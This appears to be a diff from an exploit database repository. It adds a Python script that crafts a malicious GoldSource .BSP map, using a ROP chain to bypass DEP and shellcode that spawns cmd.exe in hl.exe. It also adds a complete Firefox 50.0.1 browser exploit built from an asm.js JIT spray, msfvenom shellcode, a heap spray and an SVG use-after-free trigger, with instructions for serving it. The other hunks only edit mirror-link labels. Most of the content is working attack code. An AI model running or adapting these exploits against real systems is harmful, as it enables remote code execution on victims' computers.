# vec = VERTEX_DATA[b] ; vec = 0.0, 1.0, 0.0
|
||||
|
||||
def dw(x):
|
||||
return pack("I", x)
|
||||
|
||||
def main():
|
||||
target_file = "eip-minimized.bsp"
|
||||
output_file = "exploit-gen.bsp"
|
||||
|
||||
print "GoldSource .BSP file corruptor"
|
||||
print " by @Digital_Cold"
|
||||
print
|
||||
|
||||
l.info("Corrupting target file %s" % target_file)
|
||||
|
||||
# Read in and memory map target file
|
||||
fp = open(target_file, 'rb')
|
||||
mmfile = mmap.mmap(fp.fileno(), 0, access = mmap.ACCESS_READ | mmap.ACCESS_COPY)
|
||||
fp.close()
|
||||
|
||||
VEC3_COUNT = 63
|
||||
# then come Saved EBP and return address
|
||||
|
||||
start_idx = INDEX_BUFFER_OFF + INITIAL_OFFSET
|
||||
second_idx = VERTEX_BUFFER_INDEXES_OFF
|
||||
vertex_data_start = VERTEX_DATA_OFF + 12*0x1000 # arbitrary offset, lower causes faults
|
||||
|
||||
l.info("Writing to index buffer offset %08x...", start_idx)
|
||||
l.info("Vertex buffer indexes start %08x", second_idx)
|
||||
l.info("Vertex data at %08x", vertex_data_start)
|
||||
|
||||
data_buffer = []
|
||||
|
||||
for i in range(VEC3_COUNT):
|
||||
for j in range(3):
|
||||
data_buffer.append(str(chr(0x41+i)*4)) # easy to see pattern in memory
|
||||
|
||||
data_buffer.append("\x00\x00\x00\x00") # dont care
|
||||
data_buffer.append("\x00\x00\x00\x00") # unk1
|
||||
data_buffer.append("\x00\x00\x00\x00") # unk2
|
||||
|
||||
data_buffer.append("\x00\x00\x00\x00") # numVerts (needs to be zero to skip tail call)
|
||||
data_buffer.append("\x00\x00\x00\x00") # EBP
|
||||
data_buffer.append(dw(0x01407316)) # Saved Ret --> POP EBP; RET [hl.exe]
|
||||
|
||||
# XXX: bug in mona. This is a ptr to VirtualProtectEx!!
|
||||
# 0x387e01ec, # ptr to &VirtualProtect() [IAT steamclient.dll]
|
||||
|
||||
"""
|
||||
Register setup for VirtualAlloc() :
|
||||
--------------------------------------------
|
||||
EAX = NOP (0x90909090)
|
||||
ECX = flProtect (0x40)
|
||||
EDX = flAllocationType (0x1000)
|
||||
EBX = dwSize
|
||||
ESP = lpAddress (automatic)
|
||||
EBP = ReturnTo (ptr to jmp esp)
|
||||
ESI = ptr to VirtualAlloc()
|
||||
EDI = ROP NOP (RETN)
|
||||
--- alternative chain ---
|
||||
EAX = ptr to &VirtualAlloc()
|
||||
ECX = flProtect (0x40)
|
||||
EDX = flAllocationType (0x1000)
|
||||
EBX = dwSize
|
||||
ESP = lpAddress (automatic)
|
||||
EBP = POP (skip 4 bytes)
|
||||
ESI = ptr to JMP [EAX]
|
||||
EDI = ROP NOP (RETN)
|
||||
+ place ptr to "jmp esp" on stack, below PUSHAD
|
||||
--------------------------------------------
|
||||
"""
|
||||
|
||||
# START ROP CHAIN
|
||||
# DEP disable ROP chain
|
||||
# rop chain generated with mona.py - www.corelan.be
|
||||
#
|
||||
# useful for finding INT3 gadget - !mona find -s ccc3 -type bin -m hl,steamclient,filesystem_stdio
|
||||
rop_gadgets = [
|
||||
#0x3808A308, # INT3 # RETN [steamclient.dll]
|
||||
0x38420ade, # POP EDX # RETN [steamclient.dll]
|
||||
0x387e01e8, # ptr to &VirtualAlloc() [IAT steamclient.dll]
|
||||
0x381236c5, # MOV ESI,DWORD PTR DS:[EDX] # ADD DH,DH # RETN [steamclient.dll]
|
||||
0x381ebdc1, # POP EBP # RETN [steamclient.dll]
|
||||
0x381f98cd, # & jmp esp [steamclient.dll]
|
||||
0x387885ac, # POP EBX # RETN [steamclient.dll]
|
||||
0x00000001, # 0x00000001-> ebx
|
||||
0x384251c9, # POP EDX # RETN [steamclient.dll]
|
||||
0x00001000, # 0x00001000-> edx
|
||||
0x387cd449, # POP ECX # RETN [steamclient.dll]
|
||||
0x00000040, # 0x00000040-> ecx
|
||||
0x386c57fe, # POP EDI # RETN [steamclient.dll]
|
||||
0x385ca688, # RETN (ROP NOP) [steamclient.dll]
|
||||
0x0140b00e, # POP EAX # RETN [hl.exe]
|
||||
0x90909090, # nop
|
||||
0x385c0d3e, # PUSHAD # RETN [steamclient.dll]
|
||||
]
|
||||
|
||||
|
||||
# Can be replaced with ANY shellcode desired...
|
||||
# http://shell-storm.org/shellcode/files/shellcode-662.php
|
||||
shellcode = "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B" + \
|
||||
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9" + \
|
||||
"\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C" + \
|
||||
"\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0" + \
|
||||
"\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B" + \
|
||||
"\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72" + \
|
||||
"\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03" + \
|
||||
"\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47" + \
|
||||
"\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F" + \
|
||||
"\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72" + \
|
||||
"\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66" + \
|
||||
"\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14" + \
|
||||
"\x8E\x03\xD3\x52\x68\x78\x65\x63\x01\xFE" + \
|
||||
"\x4C\x24\x03\x68\x57\x69\x6E\x45\x54\x53" + \
|
||||
"\xFF\xD2\x68\x63\x6D\x64\x01\xFE\x4C\x24" + \
|
||||
"\x03\x6A\x05\x33\xC9\x8D\x4C\x24\x04\x51" + \
|
||||
"\xFF\xD0\x68\x65\x73\x73\x01\x8B\xDF\xFE" + \
|
||||
"\x4C\x24\x03\x68\x50\x72\x6F\x63\x68\x45" + \
|
||||
"\x78\x69\x74\x54\xFF\x74\x24\x20\xFF\x54" + \
|
||||
"\x24\x20\x57\xFF\xD0"
|
||||
|
||||
shellcode += "\xeb\xfe" # infinite loop! (we dont want hl.exe to crash)
|
||||
shellcode += "\xeb\xfe"
|
||||
shellcode += "\xeb\xfe"
|
||||
shellcode += "\xeb\xfe"
|
||||
shellcode += "\xeb\xfe"
|
||||
|
||||
shellcode_dwords = int(math.ceil(len(shellcode)/4.0))
|
||||
extra_dwords = int(math.ceil((len(rop_gadgets)+shellcode_dwords)/3.0))
|
||||
|
||||
# Loop count (needs to be the exact amount of ROP we want to write
|
||||
data_buffer.append(dw(extra_dwords))
|
||||
|
||||
for addr in rop_gadgets:
|
||||
data_buffer.append(dw(addr))
|
||||
|
||||
for b in range(shellcode_dwords):
|
||||
data = ""
|
||||
|
||||
for byte in range(4):
|
||||
idx = byte + b*4
|
||||
|
||||
# pad to nearest DWORD with INT3
|
||||
if idx >= len(shellcode):
|
||||
data += "\xcc"
|
||||
else:
|
||||
data += shellcode[idx]
|
||||
|
||||
data_buffer.append(data)
|
||||
|
||||
second_idx += 8000*4 # time 4 because we skip every-other WORD, which means each index has 4 bytes
|
||||
|
||||
# 8000 is arbitrary, but it doesn't cause the map load to exit with a FATAL before
|
||||
# we can exploit the function
|
||||
|
||||
# UNCOMMENT TO CHANGE INITIAL SIZE OF OVERFLOW
|
||||
#mmfile[NUM_EDGES_OFF] = pack("B", 0x41)
|
||||
|
||||
for i in range(int(math.ceil(len(data_buffer)/3.0))):
|
||||
mmfile[start_idx+4*i:start_idx+4*(i+1)] = pack("I", 8000+i)
|
||||
mmfile[second_idx+2*i:second_idx+2*(i+1)] = pack("H", 0x1000+i)
|
||||
|
||||
second_idx += 2 # required because the game loads every-other word
|
||||
|
||||
# This data will now be on the stack
|
||||
for j in range(3):
|
||||
sub_idx = j*4 + i*0xc
|
||||
data_idx = i*3 + j
|
||||
towrite = ""
|
||||
|
||||
if data_idx >= len(data_buffer):
|
||||
towrite = "\x00"*4
|
||||
else:
|
||||
towrite = data_buffer[i*3 + j]
|
||||
|
||||
mmfile[vertex_data_start+sub_idx:vertex_data_start+sub_idx+4] = towrite
|
||||
#l.debug("Write[%08x] --> offset %d" % (unpack("I", towrite)[0], vertex_data_start+sub_idx))
|
||||
|
||||
# write out the corrupted file
|
||||
outfile = open(output_file, "wb")
|
||||
outfile.write(mmfile)
|
||||
outfile.close()
|
||||
|
||||
l.info("Wrote %d byte exploit file to %s" % (len(mmfile), output_file))
|
||||
l.info("Copy to game maps/ directory!")
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
|
@ -26,7 +26,7 @@ do not use the exploit for attacking.
|
|||
The attached file is at:
|
||||
|
||||
http://ruder.cdut.net/attach/MS_MDB_Vul/Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.rar
|
||||
backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4625.rar (11162007-Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.rar)
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4625.rar (11162007-Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.rar)
|
||||
|
||||
MD5 Hash:73243B8823C8DC2C88AE0529CA13C4C6
|
||||
|
||||
|
|
|
@ -20,6 +20,6 @@
|
|||
was not properly initialized or (2) is deleted, aka "Time Element Memory Corruption Vulnerability."
|
||||
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20547.rar
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20547.rar
|
||||
|
||||
|
|
@ -8,7 +8,7 @@ Version: 0.3z R2
|
|||
Tested on: Windows XP SP3, Windows 7 Ultimate SP1, Windows Server 2003,
|
||||
Windows Server 2008, it should work on all Windows.
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20758.tar.gz
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20758.tar.gz
|
||||
*/
|
||||
|
||||
#include "main.h"
|
||||
|
|
|
@ -2,7 +2,7 @@ FreeSSHD all version Remote Authentication Bypass ZERODAY
|
|||
Discovered & Exploited by Kingcope
|
||||
Year 2011
|
||||
|
||||
## Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23080.zip
|
||||
# Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23080.zip
|
||||
|
||||
Run like:
|
||||
|
||||
|
|
|
@ -13,7 +13,7 @@
|
|||
Generation:
|
||||
c:\mxmlc\bin>mxmlc.exe AsXploit.as -o AsXploit.swf
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32851-AsXploit.as
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32851-AsXploit.as
|
||||
|
||||
-->
|
||||
|
||||
|
|
375
platforms/windows/remote/42327.html
Executable file
375
platforms/windows/remote/42327.html
Executable file
|
@ -0,0 +1,375 @@
|
|||
<!DOCTYPE HTML>
|
||||
|
||||
<!--
|
||||
|
||||
FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)
|
||||
PoC Exploit against Firefox 50.0.1 (CVE-2016-9079 - Tor Browser 0day)
|
||||
|
||||
Tested on:
|
||||
|
||||
Release 50.0.1 32-bit - Windows 8.1 / Windows 10
|
||||
https://ftp.mozilla.org/pub/firefox/releases/50.0.1/win32/en-US/Firefox%20Setup%2050.0.1.exe
|
||||
|
||||
Howto:
|
||||
|
||||
1) serve PoC over network and open it in Firefox 50.0.1 32-bit
|
||||
2) if you don't see cmd.exe, open processexplorer and verify that cmd.exe was spawned by firefox.exe
|
||||
|
||||
A successfull exploit attempt should pop cmd.exe
|
||||
|
||||
Writeup: https://rh0dev.github.io/blog/2017/the-return-of-the-jit/
|
||||
|
||||
(C) Rh0
|
||||
|
||||
Jul. 13, 2017
|
||||
|
||||
-->
|
||||
|
||||
<script async>
|
||||
function asm_js_module(){
|
||||
"use asm";
|
||||
/* huge jitted nop sled */
|
||||
function payload_code(){
|
||||
var val = 0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
/* 3 byte VirtualAlloc RWX stager */
|
||||
val = (val + 0xa890db31)|0;
|
||||
val = (val + 0xa89030b3)|0;
|
||||
val = (val + 0xa81b8b64)|0;
|
||||
val = (val + 0xa80c5b8b)|0;
|
||||
val = (val + 0xa81c5b8b)|0;
|
||||
val = (val + 0xa8b9006a)|0;
|
||||
val = (val + 0xa8904c4c)|0;
|
||||
val = (val + 0xa8902eb1)|0;
|
||||
val = (val + 0xa85144b5)|0;
|
||||
val = (val + 0xa8b99090)|0;
|
||||
val = (val + 0xa8903233)|0;
|
||||
val = (val + 0xa89045b1)|0;
|
||||
val = (val + 0xa8514cb5)|0;
|
||||
val = (val + 0xa8b99090)|0;
|
||||
val = (val + 0xa8904e52)|0;
|
||||
val = (val + 0xa8904bb1)|0;
|
||||
val = (val + 0xa85145b5)|0;
|
||||
val = (val + 0xa8590e6a)|0;
|
||||
val = (val + 0xa84fe789)|0;
|
||||
val = (val + 0xa8086b8b)|0;
|
||||
val = (val + 0xa820738b)|0;
|
||||
val = (val + 0xa8471b8b)|0;
|
||||
val = (val + 0xa82ae349)|0;
|
||||
val = (val + 0xa890c031)|0;
|
||||
val = (val + 0xa890ad66)|0;
|
||||
val = (val + 0xa89c613c)|0;
|
||||
val = (val + 0xa8077c9d)|0;
|
||||
val = (val + 0xa890202c)|0;
|
||||
val = (val + 0xa89c073a)|0;
|
||||
val = (val + 0xa8d7749d)|0;
|
||||
val = (val + 0xa890bdeb)|0;
|
||||
val = (val + 0xa8b9006a)|0;
|
||||
val = (val + 0xa890636f)|0;
|
||||
val = (val + 0xa8906cb1)|0;
|
||||
val = (val + 0xa8516cb5)|0;
|
||||
val = (val + 0xa8b99090)|0;
|
||||
val = (val + 0xa890416c)|0;
|
||||
val = (val + 0xa89075b1)|0;
|
||||
val = (val + 0xa85161b5)|0;
|
||||
val = (val + 0xa8b99090)|0;
|
||||
val = (val + 0xa8907472)|0;
|
||||
val = (val + 0xa89056b1)|0;
|
||||
val = (val + 0xa85169b5)|0;
|
||||
val = (val + 0xa890eb89)|0;
|
||||
val = (val + 0xa83cc583)|0;
|
||||
val = (val + 0xa8006d8b)|0;
|
||||
val = (val + 0xa890dd01)|0;
|
||||
val = (val + 0xa878c583)|0;
|
||||
val = (val + 0xa8006d8b)|0;
|
||||
val = (val + 0xa890dd01)|0;
|
||||
val = (val + 0xa820458b)|0;
|
||||
val = (val + 0xa890d801)|0;
|
||||
val = (val + 0xa890d231)|0;
|
||||
val = (val + 0xa890e789)|0;
|
||||
val = (val + 0xa8590d6a)|0;
|
||||
val = (val + 0xa810348b)|0;
|
||||
val = (val + 0xa890de01)|0;
|
||||
val = (val + 0xa890a6f3)|0;
|
||||
val = (val + 0xa8900de3)|0;
|
||||
val = (val + 0xa804c283)|0;
|
||||
val = (val + 0xa890dbeb)|0;
|
||||
val = (val + 0xa8247d8b)|0;
|
||||
val = (val + 0xa890df01)|0;
|
||||
val = (val + 0xa890ead1)|0;
|
||||
val = (val + 0xa890d701)|0;
|
||||
val = (val + 0xa890d231)|0;
|
||||
val = (val + 0xa8178b66)|0;
|
||||
val = (val + 0xa81c7d8b)|0;
|
||||
val = (val + 0xa890df01)|0;
|
||||
val = (val + 0xa802e2c1)|0;
|
||||
val = (val + 0xa890d701)|0;
|
||||
val = (val + 0xa8903f8b)|0;
|
||||
val = (val + 0xa890df01)|0;
|
||||
val = (val + 0xa890406a)|0;
|
||||
val = (val + 0xa890c031)|0;
|
||||
val = (val + 0xa85030b4)|0;
|
||||
val = (val + 0xa85010b4)|0;
|
||||
val = (val + 0xa890006a)|0;
|
||||
val = (val + 0xa890d7ff)|0;
|
||||
val = (val + 0xa890c931)|0;
|
||||
val = (val + 0xa89000b5)|0;
|
||||
val = (val + 0xa890c3b1)|0;
|
||||
val = (val + 0xa890ebd9)|0;
|
||||
val = (val + 0xa82434d9)|0;
|
||||
val = (val + 0xa890e689)|0;
|
||||
val = (val + 0xa80cc683)|0;
|
||||
val = (val + 0xa890368b)|0;
|
||||
val = (val + 0xa85fc683)|0;
|
||||
val = (val + 0xa890c789)|0;
|
||||
val = (val + 0xa81e8b66)|0;
|
||||
val = (val + 0xa81f8966)|0;
|
||||
val = (val + 0xa802c683)|0;
|
||||
val = (val + 0xa802c783)|0;
|
||||
val = (val + 0xa8901e8a)|0;
|
||||
val = (val + 0xa8901f88)|0;
|
||||
val = (val + 0xa803c683)|0;
|
||||
val = (val + 0xa801c783)|0;
|
||||
val = (val + 0xa803e983)|0;
|
||||
val = (val + 0xa89008e3)|0;
|
||||
val = (val + 0xa890cceb)|0;
|
||||
val = (val + 0xa890e0ff)|0;
|
||||
val = (val + 0xa824248d)|0;
|
||||
/* $ msfvenom --payload windows/exec CMD=cmd.exe EXITFUNC=seh */
|
||||
val = (val + 0xa882e8fc)|0;
|
||||
val = (val + 0xa8000000)|0;
|
||||
val = (val + 0xa8e58960)|0;
|
||||
val = (val + 0xa864c031)|0;
|
||||
val = (val + 0xa830508b)|0;
|
||||
val = (val + 0xa80c528b)|0;
|
||||
val = (val + 0xa814528b)|0;
|
||||
val = (val + 0xa828728b)|0;
|
||||
val = (val + 0xa84ab70f)|0;
|
||||
val = (val + 0xa8ff3126)|0;
|
||||
val = (val + 0xa8613cac)|0;
|
||||
val = (val + 0xa82c027c)|0;
|
||||
val = (val + 0xa8cfc120)|0;
|
||||
val = (val + 0xa8c7010d)|0;
|
||||
val = (val + 0xa852f2e2)|0;
|
||||
val = (val + 0xa8528b57)|0;
|
||||
val = (val + 0xa84a8b10)|0;
|
||||
val = (val + 0xa84c8b3c)|0;
|
||||
val = (val + 0xa8e37811)|0;
|
||||
val = (val + 0xa8d10148)|0;
|
||||
val = (val + 0xa8598b51)|0;
|
||||
val = (val + 0xa8d30120)|0;
|
||||
val = (val + 0xa818498b)|0;
|
||||
val = (val + 0xa8493ae3)|0;
|
||||
val = (val + 0xa88b348b)|0;
|
||||
val = (val + 0xa831d601)|0;
|
||||
val = (val + 0xa8c1acff)|0;
|
||||
val = (val + 0xa8010dcf)|0;
|
||||
val = (val + 0xa8e038c7)|0;
|
||||
val = (val + 0xa803f675)|0;
|
||||
val = (val + 0xa83bf87d)|0;
|
||||
val = (val + 0xa875247d)|0;
|
||||
val = (val + 0xa88b58e4)|0;
|
||||
val = (val + 0xa8012458)|0;
|
||||
val = (val + 0xa88b66d3)|0;
|
||||
val = (val + 0xa88b4b0c)|0;
|
||||
val = (val + 0xa8011c58)|0;
|
||||
val = (val + 0xa8048bd3)|0;
|
||||
val = (val + 0xa8d0018b)|0;
|
||||
val = (val + 0xa8244489)|0;
|
||||
val = (val + 0xa85b5b24)|0;
|
||||
val = (val + 0xa85a5961)|0;
|
||||
val = (val + 0xa8e0ff51)|0;
|
||||
val = (val + 0xa85a5f5f)|0;
|
||||
val = (val + 0xa8eb128b)|0;
|
||||
val = (val + 0xa86a5d8d)|0;
|
||||
val = (val + 0xa8858d01)|0;
|
||||
val = (val + 0xa80000b2)|0;
|
||||
val = (val + 0xa8685000)|0;
|
||||
val = (val + 0xa86f8b31)|0;
|
||||
val = (val + 0xa8d5ff87)|0;
|
||||
val = (val + 0xa80efebb)|0;
|
||||
val = (val + 0xa868ea32)|0;
|
||||
val = (val + 0xa8bd95a6)|0;
|
||||
val = (val + 0xa8d5ff9d)|0;
|
||||
val = (val + 0xa87c063c)|0;
|
||||
val = (val + 0xa8fb800a)|0;
|
||||
val = (val + 0xa80575e0)|0;
|
||||
val = (val + 0xa81347bb)|0;
|
||||
val = (val + 0xa86a6f72)|0;
|
||||
val = (val + 0xa8ff5300)|0;
|
||||
val = (val + 0xa86d63d5)|0;
|
||||
val = (val + 0xa8652e64)|0;
|
||||
val = (val + 0xa8006578)|0;
|
||||
val = (val + 0xa8909090)|0;
|
||||
|
||||
return val|0;
|
||||
}
|
||||
return payload_code
|
||||
}
|
||||
</script>
|
||||
|
||||
<script>
|
||||
function spray_asm_js_modules(){
|
||||
sprayed = []
|
||||
for (var i=0; i<= 0x1800; i++){
|
||||
sprayed[i] = asm_js_module()
|
||||
}
|
||||
}
|
||||
|
||||
/* heap spray inspired by skylined */
|
||||
function heap_spray_fake_objects(){
|
||||
var heap = []
|
||||
var current_address = 0x08000000
|
||||
var block_size = 0x1000000
|
||||
while(current_address < object_target_address){
|
||||
var heap_block = new Uint32Array(block_size/4 - 0x100)
|
||||
for (var offset = 0; offset < block_size; offset += 0x100000){
|
||||
|
||||
/* fake object target = ecx + 0x88 and fake vtable*/
|
||||
heap_block[offset/4 + 0x00/4] = object_target_address
|
||||
/* self + 4 */
|
||||
heap_block[offset/4 + 0x14/4] = object_target_address
|
||||
/* the path to EIP */
|
||||
heap_block[offset/4 + 0x18/4] = 4
|
||||
heap_block[offset/4 + 0xac/4] = 1
|
||||
/* fake virtual function --> JIT target */
|
||||
heap_block[offset/4 + 0x138/4] = jit_payload_target
|
||||
}
|
||||
heap.push(heap_block)
|
||||
current_address += block_size
|
||||
}
|
||||
return heap
|
||||
}
|
||||
|
||||
/* address of fake object */
|
||||
object_target_address = 0x30300000
|
||||
|
||||
/* address of our jitted shellcode */
|
||||
jit_payload_target = 0x1c1c0054
|
||||
|
||||
/* ASM.JS JIT Spray */
|
||||
spray_asm_js_modules()
|
||||
|
||||
/* Spray fake objects */
|
||||
heap = heap_spray_fake_objects()
|
||||
|
||||
/* -----> */
|
||||
/* bug trigger ripped from bugzilla report */
|
||||
var worker = new Worker('data:javascript,self.onmessage=function(msg){postMessage("one");postMessage("two");};');
|
||||
worker.postMessage("zero");
|
||||
var svgns = 'http://www.w3.org/2000/svg';
|
||||
var heap80 = new Array(0x1000);
|
||||
var heap100 = new Array(0x4000);
|
||||
var block80 = new ArrayBuffer(0x80);
|
||||
var block100 = new ArrayBuffer(0x100);
|
||||
var sprayBase = undefined;
|
||||
var arrBase = undefined;
|
||||
var animateX = undefined;
|
||||
var containerA = undefined;
|
||||
var offset = 0x88 // Firefox 50.0.1
|
||||
|
||||
var exploit = function(){
|
||||
var u32 = new Uint32Array(block80)
|
||||
|
||||
u32[0x4] = arrBase - offset;
|
||||
u32[0xa] = arrBase - offset;
|
||||
u32[0x10] = arrBase - offset;
|
||||
|
||||
for(i = heap100.length/2; i < heap100.length; i++)
|
||||
{
|
||||
heap100[i] = block100.slice(0)
|
||||
}
|
||||
|
||||
for(i = 0; i < heap80.length/2; i++)
|
||||
{
|
||||
heap80[i] = block80.slice(0)
|
||||
}
|
||||
|
||||
animateX.setAttribute('begin', '59s')
|
||||
animateX.setAttribute('begin', '58s')
|
||||
|
||||
for(i = heap80.length/2; i < heap80.length; i++)
|
||||
{
|
||||
heap80[i] = block80.slice(0)
|
||||
}
|
||||
|
||||
for(i = heap100.length/2; i < heap100.length; i++)
|
||||
{
|
||||
heap100[i] = block100.slice(0)
|
||||
}
|
||||
|
||||
animateX.setAttribute('begin', '10s')
|
||||
animateX.setAttribute('begin', '9s')
|
||||
containerA.pauseAnimations();
|
||||
}
|
||||
|
||||
worker.onmessage = function(e) {arrBase=object_target_address; exploit()}
|
||||
//worker.onmessage = function(e) {arrBase=0x30300000; exploit()}
|
||||
|
||||
var trigger = function(){
|
||||
containerA = document.createElementNS(svgns, 'svg')
|
||||
var containerB = document.createElementNS(svgns, 'svg');
|
||||
animateX = document.createElementNS(svgns, 'animate')
|
||||
var animateA = document.createElementNS(svgns, 'animate')
|
||||
var animateB = document.createElementNS(svgns, 'animate')
|
||||
var animateC = document.createElementNS(svgns, 'animate')
|
||||
var idA = "ia";
|
||||
var idC = "ic";
|
||||
animateA.setAttribute('id', idA);
|
||||
animateA.setAttribute('end', '50s');
|
||||
animateB.setAttribute('begin', '60s');
|
||||
animateB.setAttribute('end', idC + '.end');
|
||||
animateC.setAttribute('id', idC);
|
||||
animateC.setAttribute('end', idA + '.end');
|
||||
containerA.appendChild(animateX)
|
||||
containerA.appendChild(animateA)
|
||||
containerA.appendChild(animateB)
|
||||
containerB.appendChild(animateC)
|
||||
document.body.appendChild(containerA);
|
||||
document.body.appendChild(containerB);
|
||||
}
|
||||
|
||||
window.onload = trigger;
|
||||
setInterval("window.location.reload()", 3000)
|
||||
/* <----- */
|
||||
|
||||
</script>
|
|
@ -1,5 +1,5 @@
|
|||
Windows RSH daemon <= 1.8 Remote Buffer Overflow Exploit
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4948.tar.gz (2008-prdelka-vs-MS-rshd.tar.gz)
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4948.tar.gz (2008-prdelka-vs-MS-rshd.tar.gz)
|
||||
|
||||
# milw0rm.com [2008-01-21]
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
Versant server <= 7.0.1.3 Arbitrary Commands Execution Exploit
|
||||
|
||||
Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5213.zip (2008-versantcmd.zip)
|
||||
Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5213.zip (2008-versantcmd.zip)
|
||||
|
||||
# milw0rm.com [2008-03-04]
|
||||
|
|
Loading…
Add table
Reference in a new issue